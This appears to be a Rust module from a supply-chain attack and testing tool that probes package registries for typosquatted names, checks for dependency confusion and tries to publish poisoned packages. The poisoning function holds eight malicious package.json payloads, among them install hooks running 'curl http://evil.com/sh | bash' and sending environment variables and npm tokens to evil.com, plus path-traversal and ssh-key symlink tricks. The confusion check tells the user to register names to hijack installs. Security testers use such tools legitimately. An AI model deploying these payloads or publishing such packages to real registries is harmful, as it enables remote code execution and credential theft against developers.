use colored::Colorize;
use reqwest::Client;
use std::time::Duration;

fn build_client(timeout: u64) -> Client {
    Client::builder().timeout(Duration::from_secs(timeout)).redirect(reqwest::redirect::Policy::none()).build().unwrap_or_else(|_| Client::new())
}

const TYPOSQUAT_CANDIDATES: &[(&str, &[&str])] = &[
    ("lodash", &["lodahs", "lodsh", "lodas", "lodaash", "lodashs", "1odash", "l0dash", "lodas-h"]),
    ("requests", &["request", "reqeusts", "requestss", "rrequests", "requets", "requ3sts", "request5"]),
    ("express", &["expres", "expres5", "expreess", "exress", "eexpress", "xpress", "expr3ss"]),
    ("axios", &["axio", "axois", "axxios", "aaxios", "ax1os", "axlos"]),
    ("chalk", &["chalck", "chak", "chlk", "challk", "cha1k", "chakc"]),
    ("commander", &["comander", "commandr", "comander", "comandder", "c0mmander"]),
    ("moment", &["momment", "momnt", "mment", "momentt", "m0ment"]),
    ("react", &["ract", "reacct", "recat", "reac", "r3act", "reactt"]),
];

pub async fn typosquat(url: &str, timeout: u64, token: Option<&str>) -> anyhow::Result<()> {
    println!("{} Typosquatting Detection", "[*]".cyan().bold());
    println!("{}", "=".repeat(60).cyan());
    println!("{} Registry: {}", "[*]".cyan().bold(), url);
    println!("{} {} package families", "[*]".cyan().bold(), TYPOSQUAT_CANDIDATES.len());
    println!("{}", "-".repeat(60).dimmed());

    let client = build_client(timeout);
    let mut found = Vec::new();

    for (original, typos) in TYPOSQUAT_CANDIDATES {
        for typo in *typos {
            let pkg_url = format!("{}/{}", url, typo);
            let mut req = client.get(&pkg_url);
            if let Some(t) = token { req = req.header("Authorization", format!("Bearer {}", t)); }
            match req.send().await {
                Ok(resp) => {
                    let status = resp.status().as_u16();
                    let exists = status == 200;
                    if exists {
                        let body = resp.text().await.unwrap_or_default();
                        let suspicious = body.contains("autogenerated") || body.contains("empty") || body.contains("placeholder")
                            || body.contains("test") || body.len() < 500;
                        let tag = if suspicious { "SUSPICIOUS".red().bold().to_string() } else { "exists".yellow().to_string() };
                        println!("  {} {:20} → {:15} {}", "*".cyan(), original, typo, tag);
                        found.push((typo.to_string(), suspicious));
                    }
                }
                Err(_) => {}
            }
        }
    }

    let suspicious_count = found.iter().filter(|f| f.1).count();
    if suspicious_count > 0 {
        println!("\n{} {} suspicious typosquat(s) found!", "[!]".red().bold(), suspicious_count);
    } else if !found.is_empty() {
        println!("\n{} {} typosquatted packages exist but look legitimate.", "[*]".cyan().bold(), found.len());
    } else {
        println!("\n{} No typosquatted packages found.", "[-]".green().bold());
    }
    Ok(())
}

pub async fn confusion(url: &str, timeout: u64, token: Option<&str>) -> anyhow::Result<()> {
    println!("{} Dependency Confusion Attack", "[*]".cyan().bold());
    println!("{}", "=".repeat(60).cyan());
    println!("{} Internal registry: {}", "[*]".cyan().bold(), url);
    println!("{}", "-".repeat(60).dimmed());

    let client = build_client(timeout);
    let internal_names = [
        ("@company/ui-components", "1.0.0"),
        ("@company/auth-utils", "2.3.1"),
        ("@company/data-models", "0.9.2"),
        ("@company/api-client", "3.1.0"),
        ("@company/config-loader", "1.2.0"),
        ("company-internal-lib", "1.0.0"),
        ("company-core", "2.0.0"),
        ("company-utils", "1.5.0"),
    ];

    let mut vulnerable = Vec::new();
    for (name, version) in &internal_names {
        // Check if package exists on internal registry
        let internal_url = format!("{}/{}", url, name);
        let mut req = client.get(&internal_url);
        if let Some(t) = token { req = req.header("Authorization", format!("Bearer {}", t)); }
        let internal_exists = req.send().await.map(|r| r.status().as_u16() == 200).unwrap_or(false);

        // Check if package exists on public registry (npmjs)
        let public_url = format!("https://registry.npmjs.org/{}", name);
        let public_exists = client.get(&public_url).send().await.map(|r| r.status().as_u16() == 200).unwrap_or(false);

        if !internal_exists && public_exists {
            println!("  {} {:35} — PUBLIC ONLY (confusion possible)", "[!]".red().bold(), name);
            vulnerable.push(name.to_string());
        } else if internal_exists && !public_exists {
            println!("  {} {:35} — internal only (safe)", "*".green(), name);
        } else if internal_exists && public_exists {
            // Check if public has higher version
            let pub_resp = client.get(&public_url).send().await;
            if let Ok(r) = pub_resp {
                let body = r.text().await.unwrap_or_default();
                if let Ok(v) = serde_json::from_str::<serde_json::Value>(&body) {
                    if let Some(latest) = v.get("dist-tags").and_then(|d| d.get("latest")).and_then(|l| l.as_str()) {
                        println!("  {} {:35} — internal v{} vs public v{} (check version precedence)", "*".yellow(), name, version, latest);
                    }
                }
            }
        } else {
            println!("  {} {:35} — not found anywhere (can register!)", "[!]".red().bold(), name);
            vulnerable.push(name.to_string());
        }
    }

    if !vulnerable.is_empty() {
        println!("\n{} {} package(s) vulnerable to dependency confusion!", "[!]".red().bold(), vulnerable.len());
        println!("{} Register these on public npm to hijack installs.", "[*]".cyan().bold());
    } else {
        println!("\n{} No dependency confusion vulnerabilities found.", "[-]".green().bold());
    }
    Ok(())
}

pub async fn poison(url: &str, timeout: u64, token: Option<&str>) -> anyhow::Result<()> {
    println!("{} Package Poisoning Simulation", "[*]".cyan().bold());
    println!("{}", "=".repeat(60).cyan());
    println!("{} Registry: {}", "[*]".cyan().bold(), url);
    println!("{}", "-".repeat(60).dimmed());

    let client = build_client(timeout);
    let payloads = [
        ("Install script injection", r#"{"name":"evil-pkg","version":"1.0.0","scripts":{"install":"curl http://evil.com/sh | bash","postinstall":"node evil.js"}}"#),
        ("Preinstall hook", r#"{"name":"evil-pkg","version":"1.0.0","scripts":{"preinstall":"id > /tmp/pwned"}}"#),
        ("Binary hijack", r#"{"name":"evil-pkg","version":"1.0.0","bin":{"npm":"/tmp/evil.sh","node":"/tmp/evil.sh"}}"#),
        ("Env exfiltration", r#"{"name":"evil-pkg","version":"1.0.0","scripts":{"install":"curl http://evil.com/$(env | base64)"}}"#),
        ("Token theft", r#"{"name":"evil-pkg","version":"1.0.0","scripts":{"postinstall":"curl http://evil.com/?t=$npm_token"}}"#),
        ("Path traversal", r#"{"name":"../../../etc/cron.d/evil","version":"1.0.0","main":"evil.js"}"#),
        ("Symlink attack", r#"{"name":"evil-pkg","version":"1.0.0","files":["../../.ssh/authorized_keys"]}"#),
        ("Native addon RCE", r#"{"name":"evil-pkg","version":"1.0.0","gypfile":true,"scripts":{"install":"node-gyp rebuild && ./build/Release/evil.node"}}"#),
    ];

    let mut results = Vec::new();
    for (name, payload) in &payloads {
        let mut req = client.post(url).header("Content-Type", "application/json");
        if let Some(t) = token { req = req.header("Authorization", format!("Bearer {}", t)); }
        match req.body(payload.to_string()).send().await {
            Ok(resp) => {
                let status = resp.status().as_u16();
                let accepted = status == 200 || status == 201;
                let tag = if accepted { "PUBLISHED".red().bold().to_string() } else { "rejected".green().to_string() };
                println!("  {} {:25} status={} {}", "*".cyan(), name, status, tag);
                if accepted { results.push(name.to_string()); }
            }
            Err(_) => { println!("  {} {:25} error", "*".red(), name); }
        }
    }

    if !results.is_empty() { println!("\n{} {} malicious package(s) published!", "[!]".red().bold(), results.len()); }
    else { println!("\n{} All package publications rejected.", "[-]".green().bold()); }
    Ok(())
}

pub async fn audit(url: &str, timeout: u64, token: Option<&str>) -> anyhow::Result<()> {
    println!("{} Dependency Tree Audit", "[*]".cyan().bold());
    println!("{}", "=".repeat(60).cyan());
    println!("{} URL: {}", "[*]".cyan().bold(), url);
    println!("{}", "-".repeat(60).dimmed());

    let client = build_client(timeout);
    let checks = [
        ("Known vulnerabilities", r#"{"action":"audit","check":"vulns"}"#),
        ("Outdated packages", r#"{"action":"audit","check":"outdated"}"#),
        ("License compliance", r#"{"action":"audit","check":"licenses"}"#),
        ("Suspicious packages", r#"{"action":"audit","check":"suspicious"}"#),
        ("Flat dependencies", r#"{"action":"audit","check":"flat"}"#),
        ("Install scripts", r#"{"action":"audit","check":"scripts"}"#),
        ("Native modules", r#"{"action":"audit","check":"native"}"#),
        ("Transitive deps", r#"{"action":"audit","check":"transitive"}"#),
    ];

    let mut issues = Vec::new();
    for (name, payload) in &checks {
        let mut req = client.post(url).header("Content-Type", "application/json");
        if let Some(t) = token { req = req.header("Authorization", format!("Bearer {}", t)); }
        match req.body(payload.to_string()).send().await {
            Ok(resp) => {
                let status = resp.status().as_u16();
                let body = resp.text().await.unwrap_or_default();
                let found = body.contains("vulnerable") || body.contains("outdated") || body.contains("suspicious")
                    || body.contains("issue") || body.contains("warning") || body.contains("risk");
                let tag = if found { "ISSUES".red().bold().to_string() } else if status == 200 { "clean".green().to_string() } else { "error".to_string() };
                println!("  {} {:25} status={} {}", "*".cyan(), name, status, tag);
                if found { issues.push((name.to_string(), body.chars().take(200).collect::<String>())); }
            }
            Err(_) => { println!("  {} {:25} error", "*".red(), name); }
        }
    }

    if !issues.is_empty() {
        println!("\n{} {} audit issue(s) found:", "[!]".red().bold(), issues.len());
        for (name, detail) in &issues { println!("  {} {} — {}", "*".red(), name, detail.chars().take(100).collect::<String>()); }
    } else {
        println!("\n{} No audit issues found.", "[-]".green().bold());
    }
    Ok(())
}
